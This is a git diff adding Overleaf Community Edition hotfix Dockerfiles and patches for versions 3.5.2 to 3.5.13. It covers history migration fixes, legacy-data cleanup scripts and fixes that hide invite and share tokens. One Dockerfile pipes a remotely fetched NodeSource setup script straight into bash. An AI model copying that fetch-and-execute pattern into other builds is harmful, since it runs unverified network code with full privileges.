100644 index 0000000..716b7ce --- /dev/null +++ b/server-ce/hotfix/3.5.10/pr_13427.patch @@ -0,0 +1,92 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -73,6 +73,7 @@ async function joinProject(req, res, next) { + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] ++ project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -48,19 +48,13 @@ + deletedDocsFromDocstore + ), + members: [], +- invites, ++ invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? Path.basename(project.imageName) + : undefined, + } + +- if (result.invites == null) { +- result.invites = [] +- } +- result.invites.forEach(invite => { +- delete invite.token +- }) + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner +@@ -99,7 +93,7 @@ + let owner = null + let ownerFeatures = null + const filteredMembers = [] +- for (const member of Array.from(members || [])) { ++ for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member.user, 'owner') +@@ -128,24 +122,15 @@ + }, + + buildFolderModelView(folder) { +- let file + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, +- folders: Array.from(folder.folders || []).map(childFolder => ++ folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), +- fileRefs: (() => { +- const result = [] +- for (file of Array.from(fileRefs)) { +- result.push(this.buildFileModelView(file)) +- } +- return result +- })(), +- docs: Array.from(folder.docs || []).map(doc => +- this.buildDocModelView(doc) +- ), ++ fileRefs: fileRefs.map(file => this.buildFileModelView(file)), ++ docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + +@@ -164,4 +149,21 @@ + name: doc.name, + } + }, ++ ++ buildInvitesView(invites) { ++ if (invites == null) { ++ return [] ++ } ++ return invites.map(invite => ++ _.pick(invite, [ ++ '_id', ++ 'createdAt', ++ 'email', ++ 'expires', ++ 'privileges', ++ 'projectId', ++ 'sendingUserId', ++ ]) ++ ) ++ }, + } diff --git a/server-ce/hotfix/3.5.11/Dockerfile b/server-ce/hotfix/3.5.11/Dockerfile new file mode 100644 index 0000000..650f194 --- /dev/null +++ b/server-ce/hotfix/3.5.11/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:3.5.10 + +# Patch: Drop the old history collections and increase mongo query timeout +ADD clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js + +# Patch: convert large deleted docs to files +COPY pr_14200.patch . +RUN patch -p0 < pr_14200.patch diff --git a/server-ce/hotfix/3.5.11/clean_sl_history_data.js b/server-ce/hotfix/3.5.11/clean_sl_history_data.js new file mode 100644 index 0000000..a7497c8 --- /dev/null +++ b/server-ce/hotfix/3.5.11/clean_sl_history_data.js @@ -0,0 +1,70 @@ +// Increase default mongo query timeout from 1min to 1h +process.env.MONGO_SOCKET_TIMEOUT = process.env.MONGO_SOCKET_TIMEOUT || '360000' +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + await gracefullyDropCollection(db.docHistory) + await gracefullyDropCollection(db.docHistoryIndex) + await gracefullyDropCollection(db.projectHistoryMetaData) +} + +async function gracefullyDropCollection(collection) { + const collectionName = collection.collectionName + console.log(`removing \`${collectionName}\` data`) + try { + await collection.drop() + } catch (err) { + if (err.code === 26) { + // collection already deleted + console.log(`removing \`${collectionName}\` data - Already removed`) + } else { + throw err + } + } + console.log(`removing \`${collectionName}\` data - Done`) +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/3.5.11/pr_14200.patch b/server-ce/hotfix/3.5.11/pr_14200.patch new file mode 100644 index 0000000..57dd5f9 --- /dev/null +++ b/server-ce/hotfix/3.5.11/pr_14200.patch @@ -0,0 +1,95 @@ +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -1,6 +1,9 @@ ++const _ = require('lodash') ++const fs = require('fs') + const { ReadPreference, ObjectId } = require('mongodb') + const { db } = require('../../../../app/src/infrastructure/mongodb') + const Settings = require('@overleaf/settings') ++const logger = require('@overleaf/logger') + + const ProjectHistoryHandler = require('../../../../app/src/Features/Project/ProjectHistoryHandler') + const HistoryManager = require('../../../../app/src/Features/History/HistoryManager') +@@ -8,6 +11,8 @@ const ProjectHistoryController = require('./ProjectHistoryController') + const ProjectEntityHandler = require('../../../../app/src/Features/Project/ProjectEntityHandler') + const ProjectEntityUpdateHandler = require('../../../../app/src/Features/Project/ProjectEntityUpdateHandler') + const DocumentUpdaterHandler = require('../../../../app/src/Features/DocumentUpdater/DocumentUpdaterHandler') ++const { Doc } = require('../../../../app/src/models/Doc') ++const FileWriter = require('../../../../app/src/infrastructure/FileWriter') + + // Timestamp of when 'Enable history for SL in background' release + const ID_WHEN_FULL_PROJECT_HISTORY_ENABLED = +@@ -340,9 +345,33 @@ async function anyDocHistoryIndexExists(project) { + ) + } + ++async function convertDeletedDocToFile(projectId, docId, userId, source, doc) { ++ // write the doc to a temporary file and upload to filestore ++ const tmpFilePath = await FileWriter.promises.writeLinesToDisk( ++ projectId, ++ doc.lines ++ ) ++ await ProjectEntityUpdateHandler.promises.upsertFileWithPath( ++ projectId, ++ `/_deleted/${docId}/${doc.name}`, ++ tmpFilePath, ++ null, ++ userId, ++ source ++ ) ++ // hard delete the original doc, otherwise it will get picked up again ++ // by readDeletedDocs in ProjectHistoryController and the final ++ // resync of the history will fail. ++ await db.docs.deleteOne({ _id: docId }) ++ await db.docOps.deleteOne({ doc_id: docId }) ++ // clean up the temporary file ++ await fs.promises.unlink(tmpFilePath) ++} ++ + async function convertLargeDocsToFile(projectId, userId) { +- const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + let convertedDocCount = 0 ++ const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) ++ // Convert large docs to files + for (const doc of Object.values(docs)) { + const sizeBound = JSON.stringify(doc.lines) + if (docIsTooLarge(sizeBound, doc.lines, Settings.max_doc_length)) { +@@ -355,6 +384,39 @@ async function convertLargeDocsToFile(projectId, userId) { + convertedDocCount++ + } + } ++ // Convert deleted docs to files, these cannot be converted by ++ // ProjectEntityUpdateHandler so we do it manually ++ const docsCursor = Doc.find({ ++ project_id: ObjectId(projectId), ++ }) ++ .lean() ++ .cursor() ++ for await (const doc of docsCursor) { ++ // check whether the doc is present in the filetree instead of ++ // relying on the deletedAt property ++ const docExistsInFiletree = _.find(docs, existingDoc => ++ existingDoc._id.equals(doc._id) ++ ) ++ if (docExistsInFiletree || doc.inS3) { ++ continue ++ } ++ const sizeBound = JSON.stringify(doc.lines) ++ if (docIsTooLarge(sizeBound, doc.lines, Settings.max_doc_length)) { ++ const docId = doc._id.toString() ++ if (!_.isEmpty(doc.ranges)) { ++ throw new Error(`found too large deleted doc with ranges: ${docId}`) ++ } ++ logger.warn({ projectId, docId }, 'converting large deleted doc') ++ await convertDeletedDocToFile( ++ projectId, ++ doc._id, ++ userId, ++ 'history-migration', ++ doc ++ ) ++ convertedDocCount++ ++ } ++ } + return convertedDocCount + } diff --git a/server-ce/hotfix/3.5.12/Dockerfile b/server-ce/hotfix/3.5.12/Dockerfile new file mode 100644 index 0000000..a6eef50 --- /dev/null +++ b/server-ce/hotfix/3.5.12/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.11 + +# Patch: fix matching version when rewinding history +COPY fix-matching-version-error.patch . +RUN patch -p0 < fix-matching-version-error.patch diff --git a/server-ce/hotfix/3.5.12/fix-matching-version-error.patch b/server-ce/hotfix/3.5.12/fix-matching-version-error.patch new file mode 100644 index 0000000..dd768c2 --- /dev/null +++ b/server-ce/hotfix/3.5.12/fix-matching-version-error.patch @@ -0,0 +1,22 @@ +--- services/track-changes/app/js/ZipManager.js ++++ services/track-changes/app/js/ZipManager.js +@@ -95,6 +95,19 @@ async function rewindDoc(projectId, docId, zipfile) { + continue + } + ++ if (previousUpdate && update.v >= previousUpdate.v) { ++ logger.warn( ++ { ++ projectId, ++ docId, ++ previousUpdateVersion: previousUpdate.v, ++ updateVersion: update.v, ++ }, ++ 'adjusting version for update with matching version' ++ ) ++ update.v = previousUpdate.v - 1 ++ } ++ + const updatePath = `${id}/updates/${update.v}` + + try { diff --git a/server-ce/hotfix/3.5.13/Dockerfile b/server-ce/hotfix/3.5.13/Dockerfile new file mode 100644 index 0000000..0ae5f77 --- /dev/null +++ b/server-ce/hotfix/3.5.13/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.12 + +# Patch: fix soft history retry in cron job +COPY history_soft_retry.patch . +RUN patch -p0 < history_soft_retry.patch diff --git a/server-ce/hotfix/3.5.13/history_soft_retry.patch b/server-ce/hotfix/3.5.13/history_soft_retry.patch new file mode 100644 index 0000000..a28855f --- /dev/null +++ b/server-ce/hotfix/3.5.13/history_soft_retry.patch @@ -0,0 +1,8 @@ +--- cron/project-history-retry-soft.sh ++++ cron/project-history-retry-soft.sh +@@ -8,4 +8,4 @@ echo "-----------------------------------" + + PROJECT_HISTORY_URL='http://localhost:3054' + +-curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" ++curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/3.5.2/Dockerfile b/server-ce/hotfix/3.5.2/Dockerfile new file mode 100644 index 0000000..ff4d776 --- /dev/null +++ b/server-ce/hotfix/3.5.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.1 + +# Patch: improvements to history migration script +COPY migrate_history_fixes.patch . +RUN patch -p0 < migrate_history_fixes.patch diff --git a/server-ce/hotfix/3.5.2/migrate_history_fixes.patch b/server-ce/hotfix/3.5.2/migrate_history_fixes.patch new file mode 100644 index 0000000..8fe97e1 --- /dev/null +++ b/server-ce/hotfix/3.5.2/migrate_history_fixes.patch @@ -0,0 +1,92 @@ +--- services/track-changes/app/js/DiffGenerator.js ++++ services/track-changes/app/js/DiffGenerator.js +@@ -63,6 +63,7 @@ module.exports = DiffGenerator = { + if (p > max_p) { + logger.warn({ max_p, p }, 'truncating position to content length') + p = max_p ++ op.p = p // fix out of range offsets to avoid invalid history exports in ZipManager + } + + const textToBeRemoved = content.slice(p, p + op.i.length) +@@ -74,6 +75,9 @@ module.exports = DiffGenerator = { + + return content.slice(0, p) + content.slice(p + op.i.length) + } else if (op.d != null) { ++ if (op.p > content.length) { ++ op.p = content.length // fix out of range offsets to avoid invalid history exports in ZipManager ++ } + return content.slice(0, op.p) + op.d + content.slice(op.p) + } else { + return content + +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -107,6 +107,15 @@ async function upgradeProject(project, options) { + if (!upgradeFn) { + return { error: 'unsupported history type' } + } ++ if (options.forceClean) { ++ try { ++ const projectId = project._id ++ // delete any existing history stored in the mongo backend ++ await HistoryManager.promises.deleteProject(projectId, projectId) ++ } catch (err) { ++ // failed to delete existing history, but we can try to continue ++ } ++ } + const result = await upgradeFn(project, options) + result.historyType = historyType + return result + +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -2,6 +2,25 @@ + process.env.MONGO_SOCKET_TIMEOUT = + parseInt(process.env.MONGO_SOCKET_TIMEOUT, 10) || 3600000 + ++const fs = require('fs') ++ ++if (fs.existsSync('/etc/container_environment.json')) { ++ try { ++ const envData = JSON.parse( ++ fs.readFileSync('/etc/container_environment.json', 'utf8') ++ ) ++ for (const [key, value] of Object.entries(envData)) { ++ process.env[key] = value ++ } ++ } catch (err) { ++ console.error( ++ 'cannot read /etc/container_environment.json, the script needs to be run as root', ++ err ++ ) ++ process.exit(1) ++ } ++} ++ + const VERSION = '0.9.0-cli' + const { + countProjects, +@@ -11,7 +30,6 @@ const { + } = require('../../modules/history-migration/app/src/HistoryUpgradeHelper') + const { waitForDb } = require('../../app/src/infrastructure/mongodb') + const minimist = require('minimist') +-const fs = require('fs') + const util = require('util') + const pLimit = require('p-limit') + const logger = require('@overleaf/logger') +@@ -34,6 +52,7 @@ const argv = minimist(process.argv.slice(2), { + 'use-query-hint', + 'retry-failed', + 'archive-on-failure', ++ 'force-clean', + ], + string: ['output', 'user-id'], + alias: { +@@ -168,6 +187,7 @@ async function migrateProjects(projectsToMigrate) { + convertLargeDocsToFile: argv['convert-large-docs-to-file'], + userId: argv['user-id'], + reason: VERSION, ++ forceClean: argv['force-clean'], + } + async function _migrateProject(project) { + if (INTERRUPT) { diff --git a/server-ce/hotfix/3.5.3/Dockerfile b/server-ce/hotfix/3.5.3/Dockerfile new file mode 100644 index 0000000..8b1ee4b --- /dev/null +++ b/server-ce/hotfix/3.5.3/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.2 + +# Patch: remove stats collection from history migration script +COPY remove_stats_collection.patch . +RUN patch -p0 < remove_stats_collection.patch diff --git a/server-ce/hotfix/3.5.3/remove_stats_collection.patch b/server-ce/hotfix/3.5.3/remove_stats_collection.patch new file mode 100644 index 0000000..3f4c7b6 --- /dev/null +++ b/server-ce/hotfix/3.5.3/remove_stats_collection.patch @@ -0,0 +1,16 @@ +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -110,14 +110,6 @@ async function findProjectsToMigrate() { + process.exit(1) + } + +- // Find the total number of history records for the projects we need to migrate +- let docHistoryCount = 0 +- for await (const project of projectsToMigrate) { +- const count = await countDocHistory({ project_id: project._id }) +- docHistoryCount += count +- } +- +- console.log('Total history records to migrate:', docHistoryCount) + return projectsToMigrate + } diff --git a/server-ce/hotfix/3.5.4/Dockerfile b/server-ce/hotfix/3.5.4/Dockerfile new file mode 100644 index 0000000..b1e0c9a --- /dev/null +++ b/server-ce/hotfix/3.5.4/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.3 + +# Patch: run primary email check in saas only +COPY primary_email_check_saas.patch . +RUN patch -p0 < primary_email_check_saas.patch diff --git a/server-ce/hotfix/3.5.4/primary_email_check_saas.patch b/server-ce/hotfix/3.5.4/primary_email_check_saas.patch new file mode 100644 index 0000000..838fcb4 --- /dev/null +++ b/server-ce/hotfix/3.5.4/primary_email_check_saas.patch @@ -0,0 +1,10 @@ +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -535,6 +535,7 @@ const ProjectController = { + + if ( + user && ++ Features.hasFeature('saas') && + UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user) + ) { + return res.redirect('/user/emails/primary-email-check') diff --git a/server-ce/hotfix/3.5.5/Dockerfile b/server-ce/hotfix/3.5.5/Dockerfile new file mode 100644 index 0000000..558ec0f --- /dev/null +++ b/server-ce/hotfix/3.5.5/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:3.5.4 + +# Patch: fix shutdown sequence: flush document-updater before history services. +RUN cd /etc/my_init.pre_shutdown.d \ +&& mv 02_flush_document_updater 01_flush_document_updater \ +&& mv 01_flush_project_history 02_flush_project_history \ +&& mv 01_flush_track_changes 02_flush_track_changes diff --git a/server-ce/hotfix/3.5.6/Dockerfile b/server-ce/hotfix/3.5.6/Dockerfile new file mode 100644 index 0000000..3c78fe9 --- /dev/null +++ b/server-ce/hotfix/3.5.6/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:3.5.5 + +# Patch: support trustProxyIps in Overleaf Community Edition/Server Pro +COPY trusted_proxy_ips.patch . +RUN patch -p0 --directory=/etc/sharelatex < trusted_proxy_ips.patch + +# Patch: add script to cleanup legacy history data +ADD clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js diff --git a/server-ce/hotfix/3.5.6/clean_sl_history_data.js b/server-ce/hotfix/3.5.6/clean_sl_history_data.js new file mode 100644 index 0000000..1800692 --- /dev/null +++ b/server-ce/hotfix/3.5.6/clean_sl_history_data.js @@ -0,0 +1,60 @@ +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + console.log('removing `docHistory` data') + await db.docHistory.deleteMany({}) + console.log('removing `docHistory` data - Done') + + console.log('removing `docHistoryIndex` data') + await db.docHistoryIndex.deleteMany({}) + console.log('removing `docHistoryIndex` data - Done') + + console.log('removing `projectHistoryMetaData` data') + await db.projectHistoryMetaData.deleteMany({}) + console.log('removing `projectHistoryMetaData` data - Done') +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch b/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch new file mode 100644 index 0000000..cdba9e3 --- /dev/null +++ b/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch @@ -0,0 +1,10 @@ +--- settings.js ++++ settings.js +@@ -245,6 +245,7 @@ const settings = { + // address and http/https protocol information. + + behindProxy: process.env.SHARELATEX_BEHIND_PROXY || false, ++ trustedProxyIps: process.env.SHARELATEX_TRUSTED_PROXY_IPS, + + i18n: { + subdomainLang: { diff --git a/server-ce/hotfix/3.5.7/Dockerfile b/server-ce/hotfix/3.5.7/Dockerfile new file mode 100644 index 0000000..fed7904 --- /dev/null +++ b/server-ce/hotfix/3.5.7/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.6 + +# Patch: clean up history id on `migrate_history.js --force-clean` +COPY force_clean_fix.patch . +RUN patch -p0 < force_clean_fix.patch diff --git a/server-ce/hotfix/3.5.7/force_clean_fix.patch b/server-ce/hotfix/3.5.7/force_clean_fix.patch new file mode 100644 index 0000000..40cbf2a --- /dev/null +++ b/server-ce/hotfix/3.5.7/force_clean_fix.patch @@ -0,0 +1,40 @@ +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -115,6 +115,11 @@ async function upgradeProject(project, options) { + const projectId = project._id + // delete any existing history stored in the mongo backend + await HistoryManager.promises.deleteProject(projectId, projectId) ++ // unset overleaf.history.id to prevent the migration script from failing on checks ++ await db.projects.updateOne( ++ { _id: projectId }, ++ { $unset: { 'overleaf.history.id': '' } } ++ ) + } catch (err) { + // failed to delete existing history, but we can try to continue + } +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -147,7 +147,7 @@ async function migrateProjects(projectsToMigrate) { + } + // send log output for each migration to a file + const output = fs.createWriteStream(argv.output, { flags: 'a' }) +- console.log(`Writing log output to ${argv.output}`) ++ console.log(`Writing log output to ${process.cwd()}/${argv.output}`) + const logger = new console.Console({ stdout: output }) + function logJson(obj) { + logger.log(JSON.stringify(obj)) +@@ -253,8 +253,12 @@ async function main() { + console.log('Projects migrated: ', projectsMigrated) + console.log('Projects failed: ', projectsFailed) + if (projectsFailed > 0) { +- console.log(`Log output written to ${argv.output}`) +- console.log('Please check the log for errors.') ++ console.log('------------------------------------------------------') ++ console.log(`Log output written to ${process.cwd()}/${argv.output}`) ++ console.log( ++ 'Please check the log for errors. Attach the content of the file when contacting support.' ++ ) ++ console.log('------------------------------------------------------') + } + if (INTERRUPT) { + console.log('Migration interrupted, please run again to continue.') diff --git a/server-ce/hotfix/3.5.8/Dockerfile b/server-ce/hotfix/3.5.8/Dockerfile new file mode 100644 index 0000000..ea7b7f7 --- /dev/null +++ b/server-ce/hotfix/3.5.8/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.7 + +# Patch: fixes anonymous edits breaking history +COPY pr_13574.patch . +RUN patch -p0 < pr_13574.patch diff --git a/server-ce/hotfix/3.5.8/pr_13574.patch b/server-ce/hotfix/3.5.8/pr_13574.patch new file mode 100644 index 0000000..6d50715 --- /dev/null +++ b/server-ce/hotfix/3.5.8/pr_13574.patch @@ -0,0 +1,22 @@ +--- services/project-history/app/js/UpdateTranslator.js ++++ services/project-history/app/js/UpdateTranslator.js +@@ -73,9 +73,18 @@ function _convertToChange(projectId, updateWithBlob) { + throw error + } + ++ let v2Authors ++ if (update.meta.user_id === 'anonymous-user') { ++ // history-v1 uses null to represent an anonymous author ++ v2Authors = [null] ++ } else { ++ // user_id is missing on resync operations that update the contents of a doc ++ v2Authors = _.compact([update.meta.user_id]) ++ } ++ + const rawChange = { + operations, +- v2Authors: _.compact([update.meta.user_id]), ++ v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? v2DocVersions : null, diff --git a/server-ce/hotfix/3.5.9/Dockerfile b/server-ce/hotfix/3.5.9/Dockerfile new file mode 100644 index 0000000..d726a81 --- /dev/null +++ b/server-ce/hotfix/3.5.9/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:3.5.8 + +# Node update +RUN curl -sSL https://deb.nodesource.com/setup_16.x | bash - \ + && apt-get install -y nodejs + +# Patch: fetch access tokens via endpoint +COPY pr_13485.patch . +RUN patch -p0 < pr_13485.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.5.9/pr_13485.patch b/server-ce/hotfix/3.5.9/pr_13485.patch new file mode 100644 index 0000000..14dc931 --- /dev/null +++ b/server-ce/hotfix/3.5.9/pr_13485.patch @@ -0,0 +1,389 @@ +--- services/web/app/src/Features/Collaborators/CollaboratorsController.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsController.js +@@ -11,6 +11,7 @@ const Errors = require('../Errors/Errors') + const logger = require('@overleaf/logger') + const { expressify } = require('../../util/promises') + const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') ++const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + + module.exports = { + removeUserFromProject: expressify(removeUserFromProject), +@@ -18,6 +19,7 @@ module.exports = { + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), ++ getShareTokens: expressify(getShareTokens), + } + + async function removeUserFromProject(req, res, next) { +@@ -114,3 +116,37 @@ async function _removeUserIdFromProject(projectId, userId) { + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) + } ++ ++async function getShareTokens(req, res) { ++ const projectId = req.params.Project_id ++ const userId = SessionManager.getLoggedInUserId(req.session) ++ ++ let tokens ++ if (userId) { ++ tokens = await CollaboratorsGetter.promises.getPublicShareTokens( ++ ObjectId(userId), ++ ObjectId(projectId) ++ ) ++ } else { ++ // anonymous access, the token is already available in the session ++ const readOnly = TokenAccessHandler.getRequestToken(req, projectId) ++ tokens = { readOnly } ++ } ++ if (!tokens) { ++ return res.sendStatus(403) ++ } ++ ++ if (tokens.readOnly || tokens.readAndWrite) { ++ logger.info( ++ { ++ projectId, ++ userId: userId || 'anonymous', ++ ip: req.ip, ++ tokens: Object.keys(tokens), ++ }, ++ 'project tokens accessed' ++ ) ++ } ++ ++ res.json(tokens) ++} +--- services/web/app/src/Features/Collaborators/CollaboratorsGetter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsGetter.js +@@ -25,6 +25,7 @@ module.exports = { + getInvitedCollaboratorCount: callbackify(getInvitedCollaboratorCount), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), ++ getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { +@@ -37,6 +38,7 @@ module.exports = { + getInvitedCollaboratorCount, + getProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, ++ getPublicShareTokens, + userIsTokenMember, + getAllInvitedMembers, + }, +@@ -133,6 +135,40 @@ async function isUserInvitedMemberOfProject(userId, projectId) { + return false + } + ++async function getPublicShareTokens(userId, projectId) { ++ const memberInfo = await Project.findOne( ++ { ++ _id: projectId, ++ }, ++ { ++ isOwner: { $eq: ['$owner_ref', userId] }, ++ hasTokenReadOnlyAccess: { ++ $and: [ ++ { $in: [userId, '$tokenAccessReadOnly_refs'] }, ++ { $eq: ['$publicAccesLevel', PublicAccessLevels.TOKEN_BASED] }, ++ ], ++ }, ++ tokens: 1, ++ } ++ ) ++ .lean() ++ .exec() ++ ++ if (!memberInfo) { ++ return null ++ } ++ ++ if (memberInfo.isOwner) { ++ return memberInfo.tokens ++ } else if (memberInfo.hasTokenReadOnlyAccess) { ++ return { ++ readOnly: memberInfo.tokens.readOnly, ++ } ++ } else { ++ return {} ++ } ++} ++ + async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly] = +--- services/web/app/src/Features/Collaborators/CollaboratorsRouter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsRouter.js +@@ -22,6 +22,10 @@ const rateLimiters = { + points: 200, + duration: 60 * 10, + }), ++ getProjectTokens: new RateLimiter('get-project-tokens', { ++ points: 200, ++ duration: 60 * 10, ++ }), + } + + module.exports = { +@@ -139,5 +143,12 @@ module.exports = { + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) ++ ++ webRouter.get( ++ '/project/:Project_id/tokens', ++ RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), ++ AuthorizationMiddleware.ensureUserCanReadProject, ++ CollaboratorsController.getShareTokens ++ ) + }, + } +--- services/web/app/src/Features/Editor/EditorController.js ++++ services/web/app/src/Features/Editor/EditorController.js +@@ -581,20 +581,7 @@ const EditorController = { + { newAccessLevel } + ) + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { +- ProjectDetailsHandler.ensureTokensArePresent( +- projectId, +- function (err, tokens) { +- if (err) { +- return callback(err) +- } +- EditorRealTimeController.emitToRoom( +- projectId, +- 'project:tokens:changed', +- { tokens } +- ) +- callback() +- } +- ) ++ ProjectDetailsHandler.ensureTokensArePresent(projectId, callback) + } else { + callback() + } +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -67,8 +67,6 @@ async function joinProject(req, res, next) { + if (!project) { + return res.sendStatus(403) + } +- // Hide access tokens if this is not the project owner +- TokenAccessHandler.protectTokens(project, privilegeLevel) + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -343,7 +343,7 @@ const ProjectController = { + const userId = SessionManager.getLoggedInUserId(req.session) + ProjectGetter.findAllUsersProjects( + userId, +- 'name lastUpdated publicAccesLevel archived trashed owner_ref tokens', ++ 'name lastUpdated publicAccesLevel archived trashed owner_ref', + (err, projects) => { + if (err != null) { + return next(err) +@@ -1072,7 +1072,6 @@ const ProjectController = { + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. + const trashed = ProjectHelper.isTrashed(project, userId) && !archived + +- TokenAccessHandler.protectTokens(project, accessLevel) + const model = { + id: project._id, + name: project.name, +--- services/web/app/src/Features/Project/ProjectDetailsHandler.js ++++ services/web/app/src/Features/Project/ProjectDetailsHandler.js +@@ -207,14 +207,13 @@ async function ensureTokensArePresent(projectId) { + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { +- return project.tokens ++ return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +- return project.tokens + } + + async function clearTokens(projectId) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -49,7 +49,6 @@ module.exports = ProjectEditorHandler = { + ), + members: [], + 